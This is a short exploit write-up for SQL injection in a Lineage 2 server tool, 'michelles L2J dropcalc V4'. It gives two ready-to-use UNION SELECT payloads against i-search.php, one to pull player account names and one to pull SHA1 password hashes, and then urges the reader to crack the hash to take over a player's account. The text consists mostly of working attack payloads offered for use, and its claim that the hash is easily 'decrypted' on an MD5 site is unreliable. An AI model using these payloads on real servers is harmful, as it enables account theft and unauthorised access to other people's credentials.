This concerns only The michelles L2J dropcalc V4
SQL Injection: !! You must be logged in, using your own username and Token !!
Obtain a player username with sql injection :
http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
!! you must put the token, User and PLAYER without the "[]" !!
Obtain a password for that username (encrypted with SHA1) :
-- > !! only valid if loginserver and gameserver are in the same machine !!
http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"
Then you have the password encrypted in SHA1 :)
You must decrypt it (don't worry it's easy)
Go Here --> http://md5encryption.com/
Now you have the password of the player ;D